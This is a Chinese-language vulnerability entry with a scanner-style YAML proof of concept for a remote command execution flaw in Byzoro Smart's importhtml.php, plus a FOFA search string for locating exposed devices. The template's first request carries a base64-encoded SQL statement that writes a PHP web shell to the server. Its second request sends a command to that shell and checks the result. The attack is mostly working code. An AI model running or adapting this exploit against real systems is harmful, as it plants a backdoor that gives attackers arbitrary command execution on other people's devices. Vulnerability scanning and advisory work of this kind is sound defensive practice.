byzoro-smart-importhtml-rce: 百卓 Smart importhtml.php 远程命令执行漏洞

日期: 2025-08-01 | 影响软件: Byzoro Smart | POC: 已公开

漏洞描述

百卓 importhtml.php文件sql语句无过滤,通过Sql语句可远程命令执行 fofa: title="Smart管理平台"

PoC代码[已公开]

id: byzoro-smart-importhtml-rce

info:
  name: 百卓 Smart importhtml.php 远程命令执行漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    百卓 importhtml.php文件sql语句无过滤,通过Sql语句可远程命令执行
    fofa: title="Smart管理平台"
  tags: byzoro,smart,importhtml,rce
  created: 2025/08/15

rules:
  r0:
    request:
      method: GET
      path: /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc3lzMS5waHAn
    expression: response.status == 200
  r1:
    request:
      method: POST
      path: /app/sys1.php
      body: |
        cmd=id
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()